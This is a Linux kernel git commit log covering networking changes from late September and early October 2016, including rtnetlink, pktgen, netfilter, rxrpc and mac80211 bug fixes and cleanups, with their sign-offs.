Arnd Bergmann
fa34cd94fb net: rtnl: avoid uninitialized data in IFLA_VF_VLAN_LIST handling
With the newly added support for IFLA_VF_VLAN_LIST netlink messages,
we get a warning about potential uninitialized variable use in
the parsing of the user input when enabling the -Wmaybe-uninitialized
warning:

net/core/rtnetlink.c: In function 'do_setvfinfo':
net/core/rtnetlink.c:1756:9: error: 'ivvl$' may be used uninitialized in this function [-Werror=maybe-uninitialized]

I have not been able to prove whether it is possible to arrive in
this code with an empty IFLA_VF_VLAN_LIST block, but if we do,
then ndo_set_vf_vlan gets called with uninitialized arguments.

This adds an explicit check for an empty list, making it obvious
to the reader and the compiler that this cannot happen.

Fixes: 79aab093a0 ("net: Update API for VF vlan protocol 802.1ad support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Reviewed-by: Moshe Shemesh <moshe@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:31:48 -04:00
Paolo Abeni
63d75463c9 net: pktgen: fix pkt_size
The commit 879c7220e8 ("net: pktgen: Observe needed_headroom
of the device") increased the 'pkt_overhead' field value by
LL_RESERVED_SPACE.
As a side effect the generated packet size, computed as:

	/* Eth + IPh + UDPh + mpls */
	datalen = pkt_dev->cur_pkt_size - 14 - 20 - 8 -
		  pkt_dev->pkt_overhead;

is decreased by the same value.
The above changed slightly the behavior of existing pktgen users,
and made the procfs interface somewhat inconsistent.
Fix it by restoring the previous pkt_overhead value and using
LL_RESERVED_SPACE as extralen in skb allocation.
Also, change pktgen_alloc_skb() to only partially reserve
the headroom to allow the caller to prefetch from ll header
start.

v1 -> v2:
 - fixed some typos in the comments

Fixes: 879c7220e8 ("net: pktgen: Observe needed_headroom of the device")
Suggested-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 01:29:57 -04:00
Maciej Żenczykowski
cb9e684e89 ipv6 addrconf: remove addrconf_sysctl_hop_limit()
This is an effective no-op in terms of user observable behaviour.

By preventing the overwrite of non-null extra1/extra2 fields
in addrconf_sysctl() we can enable the use of proc_dointvec_minmax().

This allows us to eliminate the constant min/max (1..255) trampoline
function that is addrconf_sysctl_hop_limit().

This is nice because it simplifies the code, and allows future
sysctls with constant min/max limits to also not require trampolines.

We still can't eliminate the trampoline for mtu because it isn't
actually a constant (it depends on other tunables of the device)
and thus requires at-write-time logic to enforce range.

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Acked-by: Erik Kline <ek@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 23:48:13 -04:00
Stefan Agner
d4ef9f7212 netfilter: bridge: clarify bridge/netfilter message
When using bridge without bridge netfilter enabled the message
displayed is rather confusing and leads to belive that a deprecated
feature is in use. Use IS_MODULE to be explicit that the message only
affects users which use bridge netfilter as module and reword the
message.

Signed-off-by: Stefan Agner <stefan@agner.ch>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:44:03 -04:00
David S. Miller
b50afd203a Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Three sets of overlapping changes.  Nothing serious.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-02 22:20:41 -04:00
Tyler Hicks
d6169b0206 net: Use ns_capable_noaudit() when determining net sysctl permissions
The capability check should not be audited since it is only being used
to determine the inode permissions. A failed check does not indicate a
violation of security policy but, when an LSM is enabled, a denial audit
message was being generated.

The denial audit message caused confusion for some application authors
because root-running Go applications always triggered the denial. To
prevent this confusion, the capability check in net_ctl_permissions() is
switched to the noaudit variant.

BugLink: https://launchpad.net/bugs/1465724

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Acked-by: Serge E. Hallyn <serge.hallyn@ubuntu.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
[dtor: reapplied after e79c6a4fc9 ("net: make net namespace sysctls
belong to container's owner") accidentally reverted the change.]
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-01 03:24:28 -04:00
Vishwanath Pai
1f827f5138 netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division
Division of 64bit integers will cause linker error undefined reference
to `__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:27 +02:00
Aaron Conole
7816ec564e netfilter: accommodate different kconfig in nf_set_hooks_head
When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook.  This
releases the entry during the set.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
Aaron Conole
5119e4381a netfilter: Fix potential null pointer dereference
It's possible for nf_hook_entry_head to return NULL.  If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30 20:15:26 +02:00
David Howells
405dea1deb rxrpc: Fix the call timer handling
The call timer's concept of a call timeout (of which there are three) that
is inactive is that it is the timeout has the same expiration time as the
call expiration timeout (the expiration timer is never inactive).  However,
I'm not resetting the timeouts when they expire, leading to repeated
processing of expired timeouts when other timeout events occur.

Fix this by:

 (1) Move the timer expiry detection into rxrpc_set_timer() inside the
     locked section.  This means that if a timeout is set that will expire
     immediately, we deal with it immediately.

 (2) If a timeout is at or before now then it has expired.  When an expiry
     is detected, an event is raised, the timeout is automatically
     inactivated and the event processor is queued.

 (3) If a timeout is at or after the expiry timeout then it is inactive.
     Inactive timeouts do not contribute to the timer setting.

 (4) The call timer callback can now just call rxrpc_set_timer() to handle
     things.

 (5) The call processor work function now checks the event flags rather
     than checking the timeouts directly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
df0adc788a rxrpc: Keep the call timeouts as ktimes rather than jiffies
Keep that call timeouts as ktimes rather than jiffies so that they can be
expressed as functions of RTT.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:40:11 +01:00
David Howells
c31410ea00 rxrpc: Remove error from struct rxrpc_skb_priv as it is unused
Remove error from struct rxrpc_skb_priv as it is no longer used.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:32 +01:00
David Howells
775e5b71db rxrpc: The offset field in struct rxrpc_skb_priv is unnecessary
The offset field in struct rxrpc_skb_priv is unnecessary as the value can
always be calculated.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:39:28 +01:00
David Howells
0851115090 rxrpc: Reduce ssthresh to peer's receive window
When we receive an ACK from the peer that tells us what the peer's receive
window (rwind) is, we should reduce ssthresh to rwind if rwind is smaller
than ssthresh.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:59 +01:00
David Howells
8782def204 rxrpc: Switch to Congestion Avoidance mode at cwnd==ssthresh
Switch to Congestion Avoidance mode at cwnd == ssthresh rather than relying
on cwnd getting incremented beyond ssthresh and the window size, the mode
being shifted and then cwnd being corrected.

We need to make sure we switch into CA mode so that we stop marking every
packet for ACK.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-30 14:38:56 +01:00
Toke Høiland-Jørgensen
bb42f2d13f mac80211: Move reorder-sensitive TX handlers to after TXQ dequeue
The TXQ intermediate queues can cause packet reordering when more than
one flow is active to a single station. Since some of the wifi-specific
packet handling (notably sequence number and encryption handling) is
sensitive to re-ordering, things break if they are applied before the
TXQ.

This splits up the TX handlers and fast_xmit logic into two parts: An
early part and a late part. The former is applied before TXQ enqueue,
and the latter after dequeue. The non-TXQ path just applies both parts
at once.

Because fragments shouldn't be split up or reordered, the fragmentation
handler is run after dequeue. Any fragments are then kept in the TXQ and
on subsequent dequeues they take precedence over dequeueing from the FQ
structure.

This approach avoids having to scatter special cases all over the place
for when TXQ is enabled, at the cost of making the fast_xmit and TX
handler code slightly more complex.

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
[fix a few code-style nits, make ieee80211_xmit_fast_finish void,
 remove a useless txq->sta check]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-30 14:46:57 +02:00